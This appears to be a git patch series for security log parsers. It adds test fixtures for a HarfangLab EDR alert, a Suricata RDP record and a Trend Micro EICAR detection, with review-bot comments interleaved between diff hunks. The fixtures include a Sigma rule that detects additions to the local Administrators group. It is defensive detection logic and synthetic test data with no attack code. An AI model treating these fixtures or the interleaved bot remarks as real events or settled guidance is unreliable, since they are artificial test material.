@@ -0,0 +1,88 @@ +{ + "input": { + "message": "{\"type\": \"rtlogs\", \"level\": \"medium\", \"maturity\": \"stable\", \"quarantine\": 4, \"rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"alert_time\": \"2024-11-12T08:39:14.017+00:00\", \"rule_name\": \"User Account Added to the Local Administrators Group\", \"tags\": [\"attack.persistence\", \"attack.privilege_escalation\", \"attack.t1078.003\", \"attack.t1098\"], \"level_int\": 30, \"eventlog\": {\"level\": \"log_always\", \"type\": \"wineventlog\", \"detection_timestamp\": \"2024/11/12 08:39:13.967\", \"event_id\": 4732, \"event_data\": {\"SubjectUserSid\": \"S-1-2-4-5-6\", \"SubjectDomainName\": \"NT_DOMAIN\", \"PrivilegeList\": \"-\", \"TargetDomainName\": \"Builtin\", \"TargetUserName\": \"Administrateurs\", \"MemberSid\": \"S-1-2-4-7-8\", \"MemberName\": \"NT_DOMAIN\\\\DOEJ\", \"SubjectUserName\": \"sw-suser\", \"TargetSid\": \"S-1-2-3-4\", \"SubjectLogonId\": \"0x1234567\"}, \"record_number\": 174136362, \"event_date\": \"2024-11-12T08:39:13.205Z\", \"sigma_rule_content\": \"title: User Account Added to the 
Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"source_name\": \"Microsoft-Windows-Security-Auditing\", \"dont_create_eventlog\": true, \"user\": {\"domain\": \"\", \"name\": \"\", \"type\": \"unknown\", \"identifier\": \"\"}, \"thread_id\": 1728, \"log_name\": \"Security\", \"process_id\": 1224, \"status\": 0, \"ioc_matches\": [], \"provider_guid\": \"54849625-5478-4994-a5ba-3e3b0328c30d\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"log_type\": \"eventlog\", \"computer_name\": \"PC01.domain.com\", \"user_data\": {}, \"system_event_type\": \"event_log_event\"}, \"threat_values\": [], \"destination\": \"syslog\", \"@timestamp\": \"2024-11-12T08:39:14.017Z\", \"detection_date\": \"2024-11-12T08:39:13.967+00:00\", \"@event_create_date\": \"2024-11-12T08:39:14.017Z\", \"aggregation_key\": \"8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb\", \"alert_type\": \"sigma\", \"rule_id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"ingestion_date\": \"2024-11-12T08:39:14.017+00:00\", \"tenant\": \"3b37ffc8520ef542\", \"threat_type\": \"new\", \"groups\": [{\"name\": \"Postes de travail\", \"id\": 
\"11111111-2222-3333-4444-555555555555\"}, {\"name\": \"Postes de travail : Lot 3\", \"id\": \"66666666-7777-8888-9999-000000000000\"}], \"status\": \"new\", \"execution\": 0, \"agent\": {\"agentid\": \"11111111-aaaa-2222-bbbb-333333333333\", \"domain\": null, \"osproducttype\": \"Windows 10 Enterprise\", \"ostype\": \"windows\", \"dnsdomainname\": \"domain.com\", \"distroid\": null, \"domainname\": \"NT_DOMAIN\", \"osversion\": \"10.0.19045\", \"hostname\": \"PC01\", \"version\": \"4.1.6\", \"additional_info\": {}}, \"threat_key\": \"20528\", \"mitre_cells\": [\"persistence__t1078.003\", \"persistence__t1098\", \"privilege-escalation__t1078.003\", \"privilege-escalation__t1098\"], \"alert_unique_id\": \"aaaaaaaa-1111-bbbb-2222-cccccccccccc\", \"log_type\": \"alert\", \"@version\": \"1\", \"msg\": \"Detects when a user account is added into the local Administrators group.\\n This action can be the result of a malicious activity.\", \"alert_subtype\": \"eventlog\", \"detection_origin\": \"agent\"}", + "sekoiaio": { + "intake": { + "dialect": "HarfangLab EDR", + "dialect_uuid": "3c7057d3-4689-4fae-8033-6f1f887a70f2" + } + } + }, + "expected": { + "message": "{\"type\": \"rtlogs\", \"level\": \"medium\", \"maturity\": \"stable\", \"quarantine\": 4, \"rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: 
S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"alert_time\": \"2024-11-12T08:39:14.017+00:00\", \"rule_name\": \"User Account Added to the Local Administrators Group\", \"tags\": [\"attack.persistence\", \"attack.privilege_escalation\", \"attack.t1078.003\", \"attack.t1098\"], \"level_int\": 30, \"eventlog\": {\"level\": \"log_always\", \"type\": \"wineventlog\", \"detection_timestamp\": \"2024/11/12 08:39:13.967\", \"event_id\": 4732, \"event_data\": {\"SubjectUserSid\": \"S-1-2-4-5-6\", \"SubjectDomainName\": \"NT_DOMAIN\", \"PrivilegeList\": \"-\", \"TargetDomainName\": \"Builtin\", \"TargetUserName\": \"Administrateurs\", \"MemberSid\": \"S-1-2-4-7-8\", \"MemberName\": \"NT_DOMAIN\\\\DOEJ\", \"SubjectUserName\": \"sw-suser\", \"TargetSid\": \"S-1-2-3-4\", \"SubjectLogonId\": \"0x1234567\"}, \"record_number\": 174136362, \"event_date\": \"2024-11-12T08:39:13.205Z\", \"sigma_rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate 
administrator action\\nlevel: medium\", \"source_name\": \"Microsoft-Windows-Security-Auditing\", \"dont_create_eventlog\": true, \"user\": {\"domain\": \"\", \"name\": \"\", \"type\": \"unknown\", \"identifier\": \"\"}, \"thread_id\": 1728, \"log_name\": \"Security\", \"process_id\": 1224, \"status\": 0, \"ioc_matches\": [], \"provider_guid\": \"54849625-5478-4994-a5ba-3e3b0328c30d\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"log_type\": \"eventlog\", \"computer_name\": \"PC01.domain.com\", \"user_data\": {}, \"system_event_type\": \"event_log_event\"}, \"threat_values\": [], \"destination\": \"syslog\", \"@timestamp\": \"2024-11-12T08:39:14.017Z\", \"detection_date\": \"2024-11-12T08:39:13.967+00:00\", \"@event_create_date\": \"2024-11-12T08:39:14.017Z\", \"aggregation_key\": \"8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb\", \"alert_type\": \"sigma\", \"rule_id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"ingestion_date\": \"2024-11-12T08:39:14.017+00:00\", \"tenant\": \"3b37ffc8520ef542\", \"threat_type\": \"new\", \"groups\": [{\"name\": \"Postes de travail\", \"id\": \"11111111-2222-3333-4444-555555555555\"}, {\"name\": \"Postes de travail : Lot 3\", \"id\": \"66666666-7777-8888-9999-000000000000\"}], \"status\": \"new\", \"execution\": 0, \"agent\": {\"agentid\": \"11111111-aaaa-2222-bbbb-333333333333\", \"domain\": null, \"osproducttype\": \"Windows 10 Enterprise\", \"ostype\": \"windows\", \"dnsdomainname\": \"domain.com\", \"distroid\": null, \"domainname\": \"NT_DOMAIN\", \"osversion\": \"10.0.19045\", \"hostname\": \"PC01\", \"version\": \"4.1.6\", \"additional_info\": {}}, \"threat_key\": \"20528\", \"mitre_cells\": [\"persistence__t1078.003\", \"persistence__t1098\", \"privilege-escalation__t1078.003\", \"privilege-escalation__t1098\"], \"alert_unique_id\": \"aaaaaaaa-1111-bbbb-2222-cccccccccccc\", \"log_type\": \"alert\", \"@version\": \"1\", \"msg\": \"Detects when a user account is added into the local 
Administrators group.\\n This action can be the result of a malicious activity.\", \"alert_subtype\": \"eventlog\", \"detection_origin\": \"agent\"}", + "event": { + "dataset": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T08:39:14.017000Z", + "action": { + "properties": { + "MemberName": "DOEJ", + "SubjectDomainName": "NT_DOMAIN", + "SubjectLogonId": "0x1234567", + "SubjectUserName": "sw-suser", + "SubjectUserSid": "S-1-2-4-5-6", + "TargetDomainName": "Builtin", + "TargetSid": "S-1-2-3-4", + "TargetUserName": "Administrateurs" + } + }, + "agent": { + "id": "11111111-aaaa-2222-bbbb-333333333333", + "name": "harfanglab" + }, + "harfanglab": { + "aggregation_key": "8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb", + "alert_subtype": "eventlog", + "alert_time": "2024-11-12T08:39:14.017+00:00", + "alert_unique_id": "aaaaaaaa-1111-bbbb-2222-cccccccccccc", + "execution": 0, + "groups": [ + "{\"id\": \"11111111-2222-3333-4444-555555555555\", \"name\": \"Postes de travail\"}", + "{\"id\": \"66666666-7777-8888-9999-000000000000\", \"name\": \"Postes de travail : Lot 3\"}" + ], + "level": "medium", + "status": "new" + }, + "host": { + "domain": "NT_DOMAIN", + "hostname": "PC01", + "name": "PC01", + "os": { + "full": "Windows 10 Enterprise", + "version": "10.0.19045" + } + }, + "log": { + "hostname": "PC01" + }, + "organization": { + "id": "3b37ffc8520ef542" + }, + "related": { + "hosts": [ + "PC01" + ], + "user": [ + "sw-suser" + ] + }, + "rule": { + "category": "sigma", + "description": "Detects when a user account is added into the local Administrators group.\n This action can be the result of a malicious activity.", + "id": "12345678-abcd-ef90-1234-123456abcdef", + "name": "User Account Added to the Local Administrators Group" + }, + "user": { + "domain": "NT_DOMAIN", + "name": "sw-suser", + "roles": "Postesdetravail,Postesdetravail:Lot3", + "target": { + "domain": "Builtin", + "name": "Administrateurs" + } + } + } +} \ No newline at 
end of file
From 81af8ce7ab0e33cdb80e2a599e2a417641a45c5d Mon Sep 17 00:00:00 2001
From: Erwan Chevalier
Date: Fri, 29 Nov 2024 16:20:57 +0100
Subject: [PATCH 298/317] fix(suricata): missing rdp smart description
---
.../suricata/_meta/smart-descriptions.json | 16 ++++++
Suricata/suricata/tests/rdp.json | 57 +++++++++++++++++++
2 files changed, 73 insertions(+)
create mode 100644 Suricata/suricata/tests/rdp.json
diff --git a/Suricata/suricata/_meta/smart-descriptions.json b/Suricata/suricata/_meta/smart-descriptions.json
index fc89638e0..b330a23c1 100644
--- a/Suricata/suricata/_meta/smart-descriptions.json
+++ b/Suricata/suricata/_meta/smart-descriptions.json
@@ -198,6 +198,22 @@
 }
 ]
 },
+ {
+ "value": "RDP traffic from {source.ip} to {destination.ip}",
+ "conditions": [
+ {
+ "field": "action.type",
+ "value": "rdp"
+ }
+ ],
+ "relationships": [
+ {
+ "source": "source.ip",
+ "target": "destination.ip",
+ "type": "requested"
+ }
+ ]
+ },
 {
 "value": "Traffic flow from {source.ip} with {user_agent.original} to {destination.ip} with {http.request.method} request to {url.original}",
 "conditions": [
diff --git a/Suricata/suricata/tests/rdp.json b/Suricata/suricata/tests/rdp.json
new file mode 100644
index 000000000..131dd7025
--- /dev/null
+++ b/Suricata/suricata/tests/rdp.json
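Review bot: In alert_5.json the expected `user.roles` is the single string `"Postesdetravail,Postesdetravail:Lot3"`, with the spaces stripped out of the group names and the two joined by a comma, whereas ECS `user.roles` is an array of keywords; emitting `["Postes de travail", "Postes de travail : Lot 3"]` would keep the values matchable against the names carried in `harfanglab.groups`. `harfanglab.groups` itself holds each group as a JSON-encoded string (`"{\"id\": ..., \"name\": ...}"`), i.e. double-encoded JSON, rather than an object with `id` and `name` that can be queried. `related.user` lists only the subject `sw-suser`; the account actually added to the group, `DOEJ` from `MemberName`, is the pivot an analyst searches for on a 4732 and is worth adding there as well. The alert_4.json fixture earlier in this patch shows the same `user.roles`/`groups` shape, but its hunk header is not in this view.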
@@ -0,0 +1,57 @@
+{
+ "input": {
+ "message": "{\"timestamp\":\"2024-11-29T15:08:06.239558+0000\",\"flow_id\":1822723333770346,\"in_iface\":\"eth0\",\"event_type\":\"rdp\",\"src_ip\":\"14.225.46.243\",\"src_port\":58953,\"dest_ip\":\"10.0.1.4\",\"dest_port\":3389,\"proto\":\"TCP\",\"community_id\":\"1:kyALzWxuJ/ruPpAqvO4KTLSsEaQ=\",\"rdp\":{\"tx_id\":2,\"event_type\":\"tls_handshake\",\"x509_serials\":[\"773dbe1ea6dc998444b4f9da1f188ba8\"]}}",
+ "sekoiaio": {
+ "intake": {
+ "dialect": "Suricata",
+ "dialect_uuid": "331fa58d-8cf9-454a-a87f-48a3dc07d4d3"
+ }
+ }
+ },
+ "expected": {
+ "message": "{\"timestamp\":\"2024-11-29T15:08:06.239558+0000\",\"flow_id\":1822723333770346,\"in_iface\":\"eth0\",\"event_type\":\"rdp\",\"src_ip\":\"14.225.46.243\",\"src_port\":58953,\"dest_ip\":\"10.0.1.4\",\"dest_port\":3389,\"proto\":\"TCP\",\"community_id\":\"1:kyALzWxuJ/ruPpAqvO4KTLSsEaQ=\",\"rdp\":{\"tx_id\":2,\"event_type\":\"tls_handshake\",\"x509_serials\":[\"773dbe1ea6dc998444b4f9da1f188ba8\"]}}",
+ "event": {
+ "category": [
+ "network"
+ ],
+ "type": [
+ "connection"
+ ]
+ },
+ "@timestamp": "2024-11-29T15:08:06.239558Z",
+ "action": {
+ "type": "rdp"
+ },
+ "destination": {
+ "address": "10.0.1.4",
+ "ip": "10.0.1.4",
+ "port": 3389
+ },
+ "host": {
+ "ip": "14.225.46.243"
+ },
+ "network": {
+ "community_id": "1:kyALzWxuJ/ruPpAqvO4KTLSsEaQ=",
+ "protocol": "TCP",
+ "transport": "TCP"
+ },
+ "observer": {
+ "ingress": {
+ "interface": {
+ "name": "eth0"
+ }
+ }
+ },
+ "related": {
+ "ip": [
+ "10.0.1.4",
+ "14.225.46.243"
+ ]
+ },
+ "source": {
+ "address": "14.225.46.243",
+ "ip": "14.225.46.243",
+ "port": 58953
+ }
+ }
+}
\ No newline at end of file
From ce88fe4040225391a5378a96ae5662a97725203a Mon Sep 17 00:00:00 2001
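Review bot: `network.protocol` is expected as `"TCP"`, merely duplicating `network.transport`; in ECS `network.protocol` is the application-layer protocol and is normalised to lowercase, so for an `event_type: rdp` record it should be `"rdp"` (and `network.transport` conventionally `"tcp"`). The inner `rdp.event_type` (`tls_handshake`) and `rdp.x509_serials` are not mapped anywhere in the expected output, although the certificate serial is a useful pivot for tracking exposed RDP endpoints and fits `tls.server.x509.serial_number`. `host.ip` carrying the remote source address `14.225.46.243` looks inconsistent with `host.*` describing the sensor-side host, so that mapping is worth confirming against the parser. The fixture also appears to embed a routable public address; an RFC 5737 documentation range such as 203.0.113.0/24 avoids committing a real third-party IP to the repository.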
From: Sebastien Quioc
Date: Fri, 29 Nov 2024 17:16:26 +0100
Subject: [PATCH 299/317] fix(Harfanglab): add event.kind: 'alert' for harfanglab alerts
---
HarfangLab/harfanglab/ingest/parser.yml | 1 +
HarfangLab/harfanglab/tests/alert_5.json | 1 +
2 files changed, 2 insertions(+)
diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml
index 93671efde..5050c7429 100644
--- a/HarfangLab/harfanglab/ingest/parser.yml
+++ b/HarfangLab/harfanglab/ingest/parser.yml
@@ -229,6 +229,7 @@ stages:
 alert_info:
 actions:
 - set:
+ event.kind: "alert"
 harfanglab.level: "{{json_event.message.level}}"
 rule.description: "{{json_event.message.msg}}"
 rule.name: "{{json_event.message.rule_name}}"
diff --git a/HarfangLab/harfanglab/tests/alert_5.json b/HarfangLab/harfanglab/tests/alert_5.json
index 0f68a7c8c..19abfe567 100644
--- a/HarfangLab/harfanglab/tests/alert_5.json
+++ b/HarfangLab/harfanglab/tests/alert_5.json
@@ -12,6 +12,7 @@ "message": "{\"type\": \"rtlogs\", \"level\": \"medium\", \"maturity\": \"stable\", \"quarantine\": 4, \"rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"alert_time\": \"2024-11-12T08:39:14.017+00:00\", \"rule_name\": \"User Account Added to the Local Administrators Group\", \"tags\": [\"attack.persistence\", \"attack.privilege_escalation\", \"attack.t1078.003\", \"attack.t1098\"], \"level_int\": 30, \"eventlog\": {\"level\": \"log_always\", \"type\": \"wineventlog\", \"detection_timestamp\": \"2024/11/12 08:39:13.967\", \"event_id\": 4732, \"event_data\": {\"SubjectUserSid\": \"S-1-2-4-5-6\", \"SubjectDomainName\": \"NT_DOMAIN\", \"PrivilegeList\": \"-\", \"TargetDomainName\": \"Builtin\", \"TargetUserName\": \"Administrateurs\", \"MemberSid\": \"S-1-2-4-7-8\", \"MemberName\": \"NT_DOMAIN\\\\DOEJ\", \"SubjectUserName\": \"sw-suser\", \"TargetSid\": \"S-1-2-3-4\", \"SubjectLogonId\": \"0x1234567\"}, \"record_number\": 174136362, \"event_date\": \"2024-11-12T08:39:13.205Z\", \"sigma_rule_content\": \"title: User Account Added to the Local 
Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"source_name\": \"Microsoft-Windows-Security-Auditing\", \"dont_create_eventlog\": true, \"user\": {\"domain\": \"\", \"name\": \"\", \"type\": \"unknown\", \"identifier\": \"\"}, \"thread_id\": 1728, \"log_name\": \"Security\", \"process_id\": 1224, \"status\": 0, \"ioc_matches\": [], \"provider_guid\": \"54849625-5478-4994-a5ba-3e3b0328c30d\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"log_type\": \"eventlog\", \"computer_name\": \"PC01.domain.com\", \"user_data\": {}, \"system_event_type\": \"event_log_event\"}, \"threat_values\": [], \"destination\": \"syslog\", \"@timestamp\": \"2024-11-12T08:39:14.017Z\", \"detection_date\": \"2024-11-12T08:39:13.967+00:00\", \"@event_create_date\": \"2024-11-12T08:39:14.017Z\", \"aggregation_key\": \"8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb\", \"alert_type\": \"sigma\", \"rule_id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"ingestion_date\": \"2024-11-12T08:39:14.017+00:00\", \"tenant\": \"3b37ffc8520ef542\", \"threat_type\": \"new\", \"groups\": [{\"name\": \"Postes de travail\", \"id\": 
\"11111111-2222-3333-4444-555555555555\"}, {\"name\": \"Postes de travail : Lot 3\", \"id\": \"66666666-7777-8888-9999-000000000000\"}], \"status\": \"new\", \"execution\": 0, \"agent\": {\"agentid\": \"11111111-aaaa-2222-bbbb-333333333333\", \"domain\": null, \"osproducttype\": \"Windows 10 Enterprise\", \"ostype\": \"windows\", \"dnsdomainname\": \"domain.com\", \"distroid\": null, \"domainname\": \"NT_DOMAIN\", \"osversion\": \"10.0.19045\", \"hostname\": \"PC01\", \"version\": \"4.1.6\", \"additional_info\": {}}, \"threat_key\": \"20528\", \"mitre_cells\": [\"persistence__t1078.003\", \"persistence__t1098\", \"privilege-escalation__t1078.003\", \"privilege-escalation__t1098\"], \"alert_unique_id\": \"aaaaaaaa-1111-bbbb-2222-cccccccccccc\", \"log_type\": \"alert\", \"@version\": \"1\", \"msg\": \"Detects when a user account is added into the local Administrators group.\\n This action can be the result of a malicious activity.\", \"alert_subtype\": \"eventlog\", \"detection_origin\": \"agent\"}",
 "event": {
 "dataset": "alert",
+ "kind": "alert",
 "type": [
 "info"
 ]
From a71e4ec1bc766f78582c816d8633d8b733aa7790 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Mon, 2 Dec 2024 09:54:25 +0100
Subject: [PATCH 300/317] fix(TrendMicroVisionOne): add action result
---
 Trend Micro/trend-micro-vision-one/ingest/parser.yml | 1 +
 .../tests/test_eicar_test_file_detection.json | 1 +
 2 files changed, 2 insertions(+)
diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml
index 0353bb37b..988fe612e 100644
--- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml
+++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml
@@ -37,6 +37,7 @@ stages:
 rule.id: "{{parsed_event.message.model.modelId}}"
 event.url: "{{parsed_event.message.model.workbenchLink}}"
+ event.action: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'actResult') | first).value }}"
 - set:
 user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'account') | first).entityValue }}"
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json
index 5fb30866d..e503353f1 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json
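Review bot: The new `event.action` applies `| first` to the `selectattr('field', '==', 'actResult')` selection and then dereferences `.value`, so an alert whose `indicators` carry no `actResult` entry (or no `indicators` key at all) reaches an undefined value; depending on how the template engine treats undefined, that is either an empty `event.action` or a rendering error that can drop the surrounding `set`. The neighbouring `user.id` line follows the same pattern, so this is consistent with the file's existing style, but moving `event.action` into its own `- set:` guarded by `filter: "{{ parsed_event.message.indicators | selectattr('field', '==', 'actResult') | list | length > 0 }}"` keeps `rule.id` and `event.url` unaffected when the indicator is absent. The enclosing `set` action starts before the hunk.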
@@ -5,6 +5,7 @@
 "expected": {
 "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"dee5c874-1032-4f7a-baec-8ed1ef0be1af\", \"model\": \"Eicar Test File Detection\", \"modelType\": \"preset\", \"score\": 20, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:51:29Z\", \"updatedDateTime\": \"2024-11-26T16:51:29Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 0, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"host\", \"entityValue\": {\"guid\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"110299e0-d3a0-499f-9ec3-e35ab5c2c702\"}]}, \"description\": \"Eicar test file is detected in the system.\", \"matchedRules\": [{\"id\": \"1ce01ccb-d930-4a1f-9e64-c1a117344f32\", \"name\": \"Eicar Test File Detection\", \"matchedFilters\": [{\"id\": \"4c2fd712-e89a-440a-b789-9bfcd8afd443\", \"name\": \"VSAPI Eicar Detection\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"mitreTechniqueIds\": [], \"matchedEvents\": [{\"uuid\": \"2bd63c5f-7394-4c3e-9a3c-acc77d0a43dd\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"type\": \"PRODUCT_EVENT_LOG\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"detection_name\", \"field\": \"malName\", \"value\": \"Eicar_test_1\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"file_sha1\", 
\"field\": \"fileHash\", \"value\": \"667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"filename\", \"field\": \"fileName\", \"value\": \"eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"fullpath\", \"field\": \"fullPath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\Downloads\\\\eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"WINDOWS10\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"text\", \"field\": \"actResult\", \"value\": \"File quarantined\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}]}",
 "event": {
+ "action": "File quarantined",
 "category": [
 "intrusion_detection"
 ],
From 776dc1e17b4fd4090e082ba91cd775faf9b86f8e Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Mon, 2 Dec 2024 09:55:43 +0100
Subject: [PATCH 301/317] fix(TrendMicroVisionOne): fix workbench alert url
---
 Trend Micro/trend-micro-vision-one/ingest/parser.yml | 2 +-
 .../tests/test_eicar_test_file_detection.json | 3 ++-
 .../tests/test_information_gathering.json | 3 ++-
 .../tests/test_internal_network_scanner.json | 3 ++-
 Trend Micro/trend-micro-vision-one/tests/test_process.json | 3 ++-
 .../trend-micro-vision-one/tests/test_project_injection.json | 3 ++-
 Trend Micro/trend-micro-vision-one/tests/test_registry.json | 3 ++-
